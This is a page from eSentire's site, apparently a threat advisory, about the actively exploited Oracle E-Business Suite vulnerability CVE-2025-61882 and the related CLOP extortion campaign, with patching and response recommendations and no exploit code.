Combine AI-driven security operations, multi-signal attack surface coverage and 24/7 Elite Threat Hunters to help you take your security program to the next level.
Get unlimited Incident Response with threat suppression guarantee - anytime, anywhere.
CTEM and advisory programs that identify security gaps and build proactive strategies to address them.
Multi-agent Generative AI system embedded across eSentire’s Security Operations platform to scale human expertise.
Extended Detection andOpen XDR with Agentic AI & machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Customer PortalSee what our SOC sees, review investigations, and see how we are protecting your business.
Platform IntegrationsSeamless integrations and threat investigation across your existing tech stack.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Threat Response Unit (TRU)Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Cyber Resilience TeamExtend your team capabilities and prevent business disruption with expertise from eSentire.
Response and RemediationWe balance automated blocks with rapid human-led investigations to manage threats.
Flexible MDR pricing and packages that fit your unique security requirements.
Entry level foundational MDR coverage
Comprehensive Next Level eSentire MDR
Next Level eSentire MDR with Cyber Risk Advisors to continuously advance your security program
Stop ransomware before it spreads.
Identity ResponseStop identity-based cyberattacks.
Zero Day AttacksDetect and respond to zero-day exploits.
Cybersecurity ComplianceMeet regulatory compliance mandates.
Third-Party RiskDefend third-party and supply chain risk.
Cloud MisconfigurationEnd misconfigurations and policy violations.
Cyber RiskAdopt a risk-based security approach.
Mid-Market SecurityMid-market security essentials to prioritize.
Sensitive Data SecurityProtect your most sensitive data.
Cyber InsuranceMeet insurability requirements with MDR.
Cyber Threat IntelligenceOperationalize cyber threat intelligence.
Security LeadershipBuild a proven security program.
THE THREATOn October 4th, 2025 Oracle released a security advisory addressing a critical, zero-day vulnerability impacted its E-Business Suite (EBS), identified during their investigation…
THE THREATOn September 25th, 2025, watchTowr Labs revealed that a recently disclosed vulnerability in Fortra's GoAnywhere Managed File Transfer (MFT), identified as CVE-2025-10035 (CVSS:…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
About Us Leadership CareersWe provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Search our site
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
We offer three flexible MDR pricing packages that can be customized to your unique needs.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
On October 4th, 2025 Oracle released a security advisory addressing a critical, zero-day vulnerability impacted its E-Business Suite (EBS), identified during their investigation into the recently disclosed extortion campaign targeting EBS customers. CVE-2025-61882 (CVSS: 9.8) resides within the Oracle Concurrent Processing component's BI Publisher Integration in the EBS. It allows an unauthenticated attacker with network access via HTTP to potentially compromise the Concurrent Processing product. If successfully exploited, this flaw could enable an attacker to gain complete control over the product, thereby facilitating Remote Code Execution (RCE).
Oracle released the advisory following Google Threat Intelligence Group's (GTIG) disclosure about an extortion email campaign likely tied to the CLOP (aka Cl0p, FIN11, TA505) data theft and extortion group. Although the CLOP threat actor group is suspected to be responsible for the campaign, claims have emerged from another group known as the Scattered LAPSUS$ Hunters group. They shared the Proof-of-Concept (PoC) exploit code publicly on Telegram, stating their exploit code was leaked and sold to CLOP.
Given the active exploitation of CVE-2025-61882, involvement of a well-known extortion threat group, and public availability of the PoC exploit code, it is critical that organizations apply the relevant security patches immediately and upgrade to Oracle EBS's latest secure version.
Researchers from GTIG identified a "high-volume extortion campaign," observing extortion emails dated around September 29th, 2025. These emails, which were sent to executives from various organizations, alleged that the threat actor had breached their Oracle EBS systems and exfiltrated sensitive data. GTIG uncovered connections between the extortion campaign and the CLOP threat actor group. This group is well-known for conducting extortion campaigns by leveraging compromised email accounts. At least one email address associated with the group was identified from the observed extortion note.
Shortly after GTIG's update, Oracle verified the legitimacy of the extortion campaign, indicating that vulnerabilities from their July patch release had been exploited. However, the specific vulnerabilities involved were not disclosed. On October 4th, 2025, Oracle disclosed that CVE-2025-61882 had been exploited in the extortion campaign and released patches for the vulnerability. The flaw is classified as a low attack complexity vulnerability that does not require any user interaction, meaning it can easily be exploited remotely without the need for authentication. Oracle's advisory also provides a list of IoCs that were observed during the investigation into the extortion campaign.
Google Mandiant's Chief Technology Officer, Charles Carmakal stated that the CLOP group exploited vulnerabilities in Oracle EBS in August 2025. These vulnerabilities include the ones patched in July 2025 as well as CVE-2025-61882. Although no confirmation around exploited vulnerabilities from the July patch release has been provided, among the disclosed vulnerabilities there are three that can be exploited remotely, CVE-2025-30745, CVE-2025-30746, and CVE-2025-50107.
Despite the Scattered LAPSUS$ Hunters group's claims that the CLOP group stole their exploit, there is concern that the two groups might be collaborating to execute a widespread extortion campaign. The Scattered LAPSUS$ Hunters group has indicated their intention to target Oracle EBS with another exploit, which they claim to be a "better chained version that exploits EBS".
As the PoC exploit code for CVE-2025-61882 is publicly available, it is highly likely that other threat actors will target the vulnerable instances in the near future. Given the criticality of CVE-2025-61882, the widespread scope of the extortion campaign, and publicly available PoC exploit code, it is recommended that the organizations patch the flaw and other potentially exploited vulnerabilities to mitigate the risk of exploitation. Organizations that have received the extortion emails are encouraged to investigate potential breaches, report extortion attempts to law enforcement, and avoid paying ransom demands, as payment does not guarantee that threat actors will delete stolen data.
Impacted Versions List:
References:
[1] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-61882
[3] https://www.cyber.gc.ca/en/guidance/profile-ta505-cl0p-ransomware
[4] https://www.resecurity.com/blog/article/trinity-of-chaos-the-lapsus-shinyhunters-and-scattered-spider-alliance-embarks-on-global-cybercrime-spree
[5] https://www.linkedin.com/posts/austin-larsen_threatintelligence-cybersecurity-clop-activity-7379316941762727936-h8sR/
[6] https://www.linkedin.com/feed/update/urn:li:activity:7379498157208027136/
[7] https://nvd.nist.gov/vuln/detail/CVE-2025-30745
[8] https://nvd.nist.gov/vuln/detail/CVE-2025-30746
[9] https://nvd.nist.gov/vuln/detail/CVE-2025-50107